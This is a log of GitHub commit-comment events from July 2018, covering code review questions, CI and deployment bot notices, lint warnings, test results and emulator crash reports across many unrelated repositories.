{"id":"8047119399","type":"CommitCommentEvent","actor":{"login":"smitravitz"},"repo":{"name":"drydenpick/3130-Repo"},"payload":{"comment":{"id":29913088,"position":null,"line":null,"path":null,"commit_id":"ccd8ab9fffb0d30eadd9e36dc3fedb74a0ca04b9","created_at":"2018-07-31T22:50:03Z","updated_at":"2018-07-31T22:50:03Z","author_association":"COLLABORATOR","body":"**It appears that the Registration commit message was accidentally overwritten. I will here reiterate the contents of that message.**\r\n[Bug fix + Refactoring]\r\nPerformed Registration_Form.java restructuring to ensure that:\r\n- text fields are found by id and assigned to strings after submit.onClick() is invoked, not before.\r\n- all text field error checks that can be done without accessing the database are done first, and only then is the database opened to check for existing emails/usernames. \r\n- simplified program logic and flow to improve execution time and reduce potential errors. The page is made resistant to spammed behaviour and crashes\r\n- fixed add course by CRN bug which prevented the add button from being clicked more than once\r\n@smitravitz, @gobiiv "}},"created_at":"2018-07-31T22:50:03Z"}
{"id":"8047120058","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29913092,"position":null,"line":null,"path":null,"commit_id":"69f0b5420f1c6eb66020ac4afe70f33c7579ac19","created_at":"2018-07-31T22:50:15Z","updated_at":"2018-07-31T22:50:15Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/69f0b5420f1c6eb66020ac4afe70f33c7579ac19/index.html"}},"created_at":"2018-07-31T22:50:15Z"}
{"id":"8047120114","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913093,"position":4,"line":43,"path":"a_first_example/first_example.rb","commit_id":"2ccc5b58eea9843e3f41d71058a25d35c8aa5cf7","created_at":"2018-07-31T22:50:16Z","updated_at":"2018-07-31T22:50:16Z","author_association":"NONE","body":"why don't you have to call this in every \"when\" piece now?"}},"created_at":"2018-07-31T22:50:16Z"}
{"id":"8047120157","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29913096,"position":126,"line":743,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"4b377b825baebbe6dbeea0cb50fe6ff8623d06ee","created_at":"2018-07-31T22:50:17Z","updated_at":"2018-07-31T22:50:17Z","author_association":"COLLABORATOR","body":"I've added preliminary support for complex numbers in reduce in my bifrost fork if you want to give it a shot."}},"created_at":"2018-07-31T22:50:17Z"}
{"id":"8047122009","type":"CommitCommentEvent","actor":{"login":"NiLuJe"},"repo":{"name":"NiLuJe/FBInk"},"payload":{"comment":{"id":29913113,"position":null,"line":null,"path":null,"commit_id":"ce2496980c933c05d7ac5b6ffe08851c571336d4","created_at":"2018-07-31T22:50:48Z","updated_at":"2018-07-31T22:50:48Z","author_association":"OWNER","body":"@shermp : Because I hadn't thought of that, but that indeed makes much more sense ;)."}},"created_at":"2018-07-31T22:50:48Z"}
{"id":"8047123875","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913122,"position":3,"line":42,"path":"a_first_example/first_example.rb","commit_id":"1a18543952ea80360fb3aa469bee1ab1aad9d4ef","created_at":"2018-07-31T22:51:20Z","updated_at":"2018-07-31T22:51:20Z","author_association":"NONE","body":"Why is movie more accurate than rental?"}},"created_at":"2018-07-31T22:51:20Z"}
{"id":"8047124176","type":"CommitCommentEvent","actor":{"login":"aslakhellesoy"},"repo":{"name":"cucumber/cucumber"},"payload":{"comment":{"id":29913124,"position":null,"line":null,"path":null,"commit_id":"1e4c92d6f94cfb043e20e045b270897521e152c0","created_at":"2018-07-31T22:51:26Z","updated_at":"2018-07-31T22:51:26Z","author_association":"CONTRIBUTOR","body":"I see you have that as a TODO in https://github.com/cucumber/cucumber/pull/444 - good :-)"}},"created_at":"2018-07-31T22:51:26Z"}
{"id":"8047124181","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29913125,"position":null,"line":null,"path":null,"commit_id":"281b98a2d69ac96cf2276d55e9df35e011256dc0","created_at":"2018-07-31T22:51:27Z","updated_at":"2018-07-31T22:51:27Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-608](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-608).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-608-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T22:51:27Z"}
{"id":"8047126137","type":"CommitCommentEvent","actor":{"login":"thundersnow-automation"},"repo":{"name":"thundersnow-automation/devportal-d8"},"payload":{"comment":{"id":29913129,"position":null,"line":null,"path":null,"commit_id":"721a09842fe54a49127c7cf1905004c062eda965","created_at":"2018-07-31T22:52:05Z","updated_at":"2018-07-31T22:52:05Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-25](https://dashboard.pantheon.io/sites/e3db992f-35fa-4eec-b1cd-3e71f022fbfd#ci-25).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-25-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-31T22:52:05Z"}
{"id":"8047131584","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913142,"position":4,"line":51,"path":"a_first_example/first_example_spec.rb","commit_id":"45081a0bc9a13e4b37bcb0c39f86fd56d9baef07","created_at":"2018-07-31T22:53:46Z","updated_at":"2018-07-31T22:53:46Z","author_association":"NONE","body":"Why did you have to add a new test? What is being tested here?"}},"created_at":"2018-07-31T22:53:46Z"}
{"id":"8047131919","type":"CommitCommentEvent","actor":{"login":"rakion99"},"repo":{"name":"rakion99/Axon"},"payload":{"comment":{"id":29913144,"position":null,"line":null,"path":null,"commit_id":"294863162089a113332f72865784b07327d9d4b6","created_at":"2018-07-31T22:53:52Z","updated_at":"2018-07-31T22:53:52Z","author_association":"OWNER","body":"lean c++... that's the tutorial"}},"created_at":"2018-07-31T22:53:52Z"}
{"id":"8047133896","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29913150,"position":27,"line":420,"path":"test/Sema/attr-psets.cpp","commit_id":"a1f51735bac4570318413881d75e131913da6683","created_at":"2018-07-31T22:54:28Z","updated_at":"2018-07-31T22:54:28Z","author_association":"COLLABORATOR","body":"I believe `p` should still be valid here, since it points to `s`.\r\nWe would invalidate `p` only, if it pointed to something *owned by* `s`. (It is the degree in your code I believe)\r\n\r\nE.g.:\r\n```\r\nauto up = make_unique<int>(42); // up is an Owner \r\nint* p = up.get(); // p is a Pointer, now points to “data owned by up” \r\n*p = 43; // ok: up is still keeping *p alive, p is valid \r\nup.reset(); // A: non-const operation on up Þ invalidates p \r\n*p = 43; // ERROR (lifetime.1), ‘p’ pointed to data owned by \r\n// ‘up’ and was invalidated by ‘up.rese\r\n```"}},"created_at":"2018-07-31T22:54:28Z"}
{"id":"8047135142","type":"CommitCommentEvent","actor":{"login":"bbimeredithedwards"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913163,"position":31,"line":78,"path":"a_first_example/first_example.rb","commit_id":"45081a0bc9a13e4b37bcb0c39f86fd56d9baef07","created_at":"2018-07-31T22:54:53Z","updated_at":"2018-07-31T22:54:53Z","author_association":"NONE","body":"How is this method different in its shape from #base_cost_of_rental?"}},"created_at":"2018-07-31T22:54:53Z"}
{"id":"8047139007","type":"CommitCommentEvent","actor":{"login":"NiLuJe"},"repo":{"name":"NiLuJe/FBInk"},"payload":{"comment":{"id":29913173,"position":null,"line":null,"path":null,"commit_id":"ce2496980c933c05d7ac5b6ffe08851c571336d4","created_at":"2018-07-31T22:56:06Z","updated_at":"2018-07-31T22:56:06Z","author_association":"OWNER","body":"In the same vein (although that's an estimate in this case), `button_height_offset` is basically `target_lines / 2` ;)."}},"created_at":"2018-07-31T22:56:06Z"}
{"id":"8047141138","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"darkain/phpmyadmin"},"payload":{"comment":{"id":29913192,"position":null,"line":null,"path":null,"commit_id":"423ef47f918b250d9cf5ac7756c726a73a7c6a39","created_at":"2018-07-31T22:56:40Z","updated_at":"2018-07-31T22:56:40Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-31T22:56:40Z"}
{"id":"8047141227","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"darkain/phpmyadmin"},"payload":{"comment":{"id":29913194,"position":null,"line":null,"path":null,"commit_id":"ef7803616c5ad655095217484ff17faf81e10bc6","created_at":"2018-07-31T22:56:42Z","updated_at":"2018-07-31T22:56:42Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-31T22:56:42Z"}
{"id":"8047141309","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"darkain/phpmyadmin"},"payload":{"comment":{"id":29913195,"position":null,"line":null,"path":null,"commit_id":"ef90ff33d902618ee5a3eb231460408cb5bbaed7","created_at":"2018-07-31T22:56:43Z","updated_at":"2018-07-31T22:56:43Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-31T22:56:43Z"}
{"id":"8047143259","type":"CommitCommentEvent","actor":{"login":"nedrichards"},"repo":{"name":"flathub/org.gnome.Podcasts"},"payload":{"comment":{"id":29913202,"position":3,"line":19,"path":"org.gnome.Podcasts.json","commit_id":"08db3dd712e86a7ee086248e06f6107759037c86","created_at":"2018-07-31T22:57:18Z","updated_at":"2018-07-31T22:57:18Z","author_association":"MEMBER","body":"this left a trailing comma which broke the build https://flathub.org/builds/#/builders/53/builds/1310"}},"created_at":"2018-07-31T22:57:18Z"}
{"id":"8047143557","type":"CommitCommentEvent","actor":{"login":"rxwei"},"repo":{"name":"tensorflow/swift-models"},"payload":{"comment":{"id":29913205,"position":null,"line":null,"path":null,"commit_id":"a5f5ca658dc66d2a22d35c68a6c09eefa7ad330e","created_at":"2018-07-31T22:57:23Z","updated_at":"2018-07-31T22:57:23Z","author_association":"MEMBER","body":"Great finding :)"}},"created_at":"2018-07-31T22:57:23Z"}
{"id":"8047147856","type":"CommitCommentEvent","actor":{"login":"alatiera"},"repo":{"name":"flathub/org.gnome.Podcasts"},"payload":{"comment":{"id":29913224,"position":3,"line":19,"path":"org.gnome.Podcasts.json","commit_id":"08db3dd712e86a7ee086248e06f6107759037c86","created_at":"2018-07-31T22:58:42Z","updated_at":"2018-07-31T22:58:42Z","author_association":"COLLABORATOR","body":"whoops, on it! For some reason gnome-builder lints did not fire up"}},"created_at":"2018-07-31T22:58:42Z"}
{"id":"8047152117","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29913241,"position":null,"line":null,"path":null,"commit_id":"f1eb0525e8cacc1a8d5b27bfaf0c5fb6a328c843","created_at":"2018-07-31T23:00:02Z","updated_at":"2018-07-31T23:00:02Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-609](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-609).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-609-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T23:00:02Z"}
{"id":"8047155552","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29913255,"position":null,"line":null,"path":null,"commit_id":"846b18de521d30d060e279c4b05ae577dc267b49","created_at":"2018-07-31T23:00:59Z","updated_at":"2018-07-31T23:00:59Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#ci-298](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#ci-298).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-298-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T23:00:59Z"}
{"id":"8047155972","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29913260,"position":null,"line":null,"path":null,"commit_id":"5f77fc3cb12a2e78bde994fa5bb00262b36be496","created_at":"2018-07-31T23:01:06Z","updated_at":"2018-07-31T23:01:06Z","author_association":"COLLABORATOR","body":"Nice!\r\n\r\nMaybe we should just put all the Centaur parts in the Centaur directory. You shared the texture sheet with Atlas V didn't you :-)"}},"created_at":"2018-07-31T23:01:06Z"}
{"id":"8047157902","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29913268,"position":null,"line":null,"path":null,"commit_id":"1af2ea0f5b70511e5c2f093ea426cac944e68f73","created_at":"2018-07-31T23:01:41Z","updated_at":"2018-07-31T23:01:41Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-142](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-142).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-142-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T23:01:41Z"}
{"id":"8047157974","type":"CommitCommentEvent","actor":{"login":"msaelices"},"repo":{"name":"nativescript-vue/nativescript-vue"},"payload":{"comment":{"id":29913269,"position":null,"line":null,"path":null,"commit_id":"ce39a388ad5903c799cad8a54fc3fc29557f30b2","created_at":"2018-07-31T23:01:43Z","updated_at":"2018-07-31T23:01:43Z","author_association":"CONTRIBUTOR","body":"@rigor789 done:  https://github.com/nativescript-vue/nativescript-vue/commit/980ee35d954b946dbcbf6705b8373c5d0b8cf13e"}},"created_at":"2018-07-31T23:01:43Z"}
{"id":"8047160608","type":"CommitCommentEvent","actor":{"login":"ela-p-p"},"repo":{"name":"hAckeDD-bootcampTeam/Project-2"},"payload":{"comment":{"id":29913280,"position":null,"line":null,"path":null,"commit_id":"dc355e3059da246e99265011d53a078cb1be3534","created_at":"2018-07-31T23:02:29Z","updated_at":"2018-07-31T23:02:29Z","author_association":"NONE","body":"https://pastebin.com/api\r\npastebin is akin to github gists. it's a repo for code snippets.  "}},"created_at":"2018-07-31T23:02:29Z"}
{"id":"8047163056","type":"CommitCommentEvent","actor":{"login":"alatiera"},"repo":{"name":"flathub/org.gnome.Podcasts"},"payload":{"comment":{"id":29913294,"position":3,"line":19,"path":"org.gnome.Podcasts.json","commit_id":"08db3dd712e86a7ee086248e06f6107759037c86","created_at":"2018-07-31T23:03:15Z","updated_at":"2018-07-31T23:03:15Z","author_association":"COLLABORATOR","body":"should be [fixed][1], thanks for catching it up!\r\n\r\n[1]: https://github.com/flathub/org.gnome.Podcasts/commit/38bcf31de09cbccd7eb598281e419fdb0b49af33"}},"created_at":"2018-07-31T23:03:15Z"}
{"id":"8047164714","type":"CommitCommentEvent","actor":{"login":"medwards1771"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913298,"position":19,"line":86,"path":"a_first_example/first_example.rb","commit_id":"c3fa29b1662670d6f57f4cc1ad2caf371d17ac84","created_at":"2018-07-31T23:03:45Z","updated_at":"2018-07-31T23:03:45Z","author_association":"COLLABORATOR","body":"why did you add this logic to the case statement inside #extra_charge_for_rental instead of somewhere inside #statement ?"}},"created_at":"2018-07-31T23:03:45Z"}
{"id":"8047165633","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"hbc/bcbioSingleCell"},"payload":{"comment":{"id":29913301,"position":null,"line":null,"path":null,"commit_id":"2992d36b78c966204a2f5d5ce63f1fee09e55caf","created_at":"2018-07-31T23:04:02Z","updated_at":"2018-07-31T23:04:02Z","author_association":"NONE","body":"[R/plotMarker-methods.R:1:1:](https://github.com/hbc/bcbioSingleCell/blob/2992d36b78c966204a2f5d5ce63f1fee09e55caf/R/plotMarker-methods.R#L1) *style:* **TODO comments should be removed.**\n```r\n​# TODO Add gene2symbol support here\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotMarker-methods.R:2:1:](https://github.com/hbc/bcbioSingleCell/blob/2992d36b78c966204a2f5d5ce63f1fee09e55caf/R/plotMarker-methods.R#L2) *style:* **TODO comments should be removed.**\n```r\n​# TODO Add assert check that the marker input ident matches the object\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zinbwave-internal.R:4:5:](https://github.com/hbc/bcbioSingleCell/blob/2992d36b78c966204a2f5d5ce63f1fee09e55caf/R/zinbwave-internal.R#L4) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    Y,\n    ^\n```\n[R/zinbwave-internal.R:5:5:](https://github.com/hbc/bcbioSingleCell/blob/2992d36b78c966204a2f5d5ce63f1fee09e55caf/R/zinbwave-internal.R#L5) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    BPPARAM = BiocParallel::SerialParam(),\n    ^~~~~~~\n```\n[R/zinbwave-internal.R:11:5:](https://github.com/hbc/bcbioSingleCell/blob/2992d36b78c966204a2f5d5ce63f1fee09e55caf/R/zinbwave-internal.R#L11) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    Y <- as(Y, \"SingleCellExperiment\")\n    ^\n```"}},"created_at":"2018-07-31T23:04:02Z"}
{"id":"8047166669","type":"CommitCommentEvent","actor":{"login":"medwards1771"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913307,"position":4,"line":43,"path":"a_first_example/first_example.rb","commit_id":"1cf7d82ff6a4cf095f404e1dd3015ebc51a4539a","created_at":"2018-07-31T23:04:21Z","updated_at":"2018-07-31T23:04:21Z","author_association":"COLLABORATOR","body":"Why charge > cost?"}},"created_at":"2018-07-31T23:04:21Z"}
{"id":"8047174350","type":"CommitCommentEvent","actor":{"login":"King7ipthem"},"repo":{"name":"rakion99/Axon"},"payload":{"comment":{"id":29913337,"position":null,"line":null,"path":null,"commit_id":"294863162089a113332f72865784b07327d9d4b6","created_at":"2018-07-31T23:06:47Z","updated_at":"2018-07-31T23:06:47Z","author_association":"NONE","body":"Ok Thank you rakion you are the best\n\nOn Wed, Aug 1, 2018, 12:53 AM rakion99 <notifications@github.com> wrote:\n\n> lean c++... that's the tutorial\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rakion99/Axon/commit/294863162089a113332f72865784b07327d9d4b6#commitcomment-29913144>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Amqw5qm-DgxN_Iofjke3xBwupL4nZe9eks5uMOABgaJpZM4Trfh1>\n> .\n>\n"}},"created_at":"2018-07-31T23:06:47Z"}
{"id":"8047177735","type":"CommitCommentEvent","actor":{"login":"florian-dacosta"},"repo":{"name":"akretion/ak-odoo-incubator"},"payload":{"comment":{"id":29913349,"position":53,"line":231,"path":"stock_orderpoint_traffic_lights/models/stock_warehouse_orderpoint.py","commit_id":"28b49041e39cc3fa362bb50fae63091d73893f61","created_at":"2018-07-31T23:07:48Z","updated_at":"2018-07-31T23:07:48Z","author_association":"MEMBER","body":"Non, je ne pense pas.\r\nOn prend le max entre le min et le max (en principe, ce sera toujours le max, sauf mauvaise config...\r\net on ajoute la quantité future. En effet, si en considérant tous les mouvements futurs, on est en négatif, ca veut dire qu'il y a plus de sortant que d'entrant, auquel cas, on veut la différence + le max, pour arriver au max de la règle.\r\n"}},"created_at":"2018-07-31T23:07:48Z"}
{"id":"8047180639","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29913359,"position":null,"line":null,"path":null,"commit_id":"0debe2297976539381b6a85f4155b06539dbf2f7","created_at":"2018-07-31T23:08:45Z","updated_at":"2018-07-31T23:08:45Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-28](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-28).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-28-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T23:08:45Z"}
{"id":"8047184720","type":"CommitCommentEvent","actor":{"login":"medwards1771"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913372,"position":19,"line":82,"path":"a_first_example/first_example.rb","commit_id":"c0a27827254e7c0336d2a5397e0a43a8a7c1a568","created_at":"2018-07-31T23:10:06Z","updated_at":"2018-07-31T23:10:06Z","author_association":"COLLABORATOR","body":"Why did you need to add Movie::NEW_RELEASE to this case statement? It kind of looks like new functionality but then again I'm not sure because there's not a new test."}},"created_at":"2018-07-31T23:10:06Z"}
{"id":"8047185801","type":"CommitCommentEvent","actor":{"login":"powersj"},"repo":{"name":"CanonicalLtd/server-dev-summary"},"payload":{"comment":{"id":29913374,"position":13,"line":30,"path":"generate.sh","commit_id":"92b79095df3da8bf4fd5ca088188da1b6c69b9ce","created_at":"2018-07-31T23:10:26Z","updated_at":"2018-07-31T23:10:26Z","author_association":"COLLABORATOR","body":"Is this debug code?"}},"created_at":"2018-07-31T23:10:26Z"}
{"id":"8047185832","type":"CommitCommentEvent","actor":{"login":"sparklingrobots"},"repo":{"name":"sparklingrobots/pantheon-d8-composer-project-tk"},"payload":{"comment":{"id":29913375,"position":null,"line":null,"path":null,"commit_id":"74fb0bbde2a19eaad0e164facdec948caa04f160","created_at":"2018-07-31T23:10:27Z","updated_at":"2018-07-31T23:10:27Z","author_association":"OWNER","body":"Created multidev environment [pantheon-d8-composer-project-tk#ci-30](https://dashboard.pantheon.io/sites/399aa65a-6e55-43fc-bc1a-072c581bc68c#ci-30).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-30-pantheon-d8-composer-project-tk.pantheonsite.io/)"}},"created_at":"2018-07-31T23:10:27Z"}
{"id":"8047186360","type":"CommitCommentEvent","actor":{"login":"ela-p-p"},"repo":{"name":"hAckeDD-bootcampTeam/Project-2"},"payload":{"comment":{"id":29913376,"position":null,"line":null,"path":null,"commit_id":"dc355e3059da246e99265011d53a078cb1be3534","created_at":"2018-07-31T23:10:37Z","updated_at":"2018-07-31T23:10:37Z","author_association":"NONE","body":"https://developer.github.com/v3/search/#search-code\r\ngithub has an api that allows searching. Can input very narrow searches by using their meta tags."}},"created_at":"2018-07-31T23:10:37Z"}
{"id":"8047186521","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29913379,"position":null,"line":null,"path":null,"commit_id":"cf0d27f12539d737c6876197ef52d011560197ba","created_at":"2018-07-31T23:10:41Z","updated_at":"2018-07-31T23:10:41Z","author_association":"COLLABORATOR","body":"- New action types: `FETCH_MESSAGES`, `OVERLAY_VOICE_CHANNEL_SELECT`, `OVERLAY_SEND_MESSAGE`"}},"created_at":"2018-07-31T23:10:41Z"}
{"id":"8047191264","type":"CommitCommentEvent","actor":{"login":"styfle"},"repo":{"name":"elliott1130/mma-api"},"payload":{"comment":{"id":29913402,"position":32,"line":32,"path":"Fighter Extract","commit_id":"bacb0563a88fcc779a6f1bbcc43468efc69e2d2d","created_at":"2018-07-31T23:12:17Z","updated_at":"2018-07-31T23:12:17Z","author_association":"NONE","body":"@elliott1130  I think you want to change this line to be \r\n\r\n```\r\nr = requests.get(api.format(row[0]))\r\n```"}},"created_at":"2018-07-31T23:12:17Z"}
{"id":"8047192559","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29913403,"position":null,"line":null,"path":null,"commit_id":"09c8c103b694d5313b5a5207a79176a24c8863d4","created_at":"2018-07-31T23:12:43Z","updated_at":"2018-07-31T23:12:43Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-146](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-146).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-146-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-31T23:12:43Z"}
{"id":"8047193049","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29913405,"position":null,"line":null,"path":null,"commit_id":"27eba341513fb3cf9b68ad88c726db2a36775544","created_at":"2018-07-31T23:12:53Z","updated_at":"2018-07-31T23:12:53Z","author_association":"NONE","body":"158270028_Issue#6422 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1707 of 1707 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-27eba341513fb3cf9b68ad88c726db2a36775544-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.42%25-green.png)</a>\n"}},"created_at":"2018-07-31T23:12:53Z"}
{"id":"8047194818","type":"CommitCommentEvent","actor":{"login":"medwards1771"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913409,"position":16,"line":92,"path":"a_first_example/first_example.rb","commit_id":"0fbfc319fc96b74090914c3c9be36863021c1e08","created_at":"2018-07-31T23:13:27Z","updated_at":"2018-07-31T23:13:27Z","author_association":"COLLABORATOR","body":"How were you able to figure out that new releases do not have the concept of base rental period?"}},"created_at":"2018-07-31T23:13:27Z"}
{"id":"8047196077","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"Urichardson74/netcore-workbook"},"payload":{"comment":{"id":29913412,"position":16,"line":16,"path":"Lesson02/BaseProject/BaseProject/Intrastructure/TagHelpers/AutoCompleteTagHelper.cs","commit_id":"e5919402d1ca5f9ad598b3cdd58d195739f5bf27","created_at":"2018-07-31T23:13:52Z","updated_at":"2018-07-31T23:13:52Z","author_association":"NONE","body":"Close, but not quite. I am looking for a tag helper that looks for an attribute like `disable-autocomplete` (or something similar, what you name it is up to you) and converts it to `autocomplete=\"off\"`. Can you update this class to do that?"}},"created_at":"2018-07-31T23:13:52Z"}
{"id":"8047198631","type":"CommitCommentEvent","actor":{"login":"medwards1771"},"repo":{"name":"stride-nyc/evil_genius_podcast_exercises"},"payload":{"comment":{"id":29913415,"position":18,"line":86,"path":"a_first_example/first_example.rb","commit_id":"185c7a96dca3d46b0acce63c8ec361bb0fdd9104","created_at":"2018-07-31T23:14:43Z","updated_at":"2018-07-31T23:14:43Z","author_association":"COLLABORATOR","body":"I don't understand. How does it work for new releases to have an infinite base_rental_period??"}},"created_at":"2018-07-31T23:14:43Z"}
{"id":"8047199902","type":"CommitCommentEvent","actor":{"login":"Tafoid"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29913423,"position":null,"line":null,"path":null,"commit_id":"1a899d987f40730c839f8adf719d18a0789062e9","created_at":"2018-07-31T23:15:10Z","updated_at":"2018-07-31T23:15:10Z","author_association":"CONTRIBUTOR","body":"abc1600 - abc1600.cpp\r\npcfx , pcfxga - pcfx.cpp\r\nv1050 - v1050.cpp\r\nException at EIP=00000000028c2d80 (scsi_port_device::write_rst(int)+0x0070): ACCESS VIOLATION\r\n\r\n-----\r\n\r\nslicer - slicer.cpp\r\nException at EIP=00000000028c2450 (scsi_port_device::write_sel(int)+0x0070): ACCESS VIOLATION\r\n\r\n-----\r\n\r\nwmbulletf - bullet.cpp\r\nException at EIP=00000000028c2ae0 (scsi_port_device::write_ack(int)+0x0070): ACCESS VIOLATION\r\n"}},"created_at":"2018-07-31T23:15:10Z"}
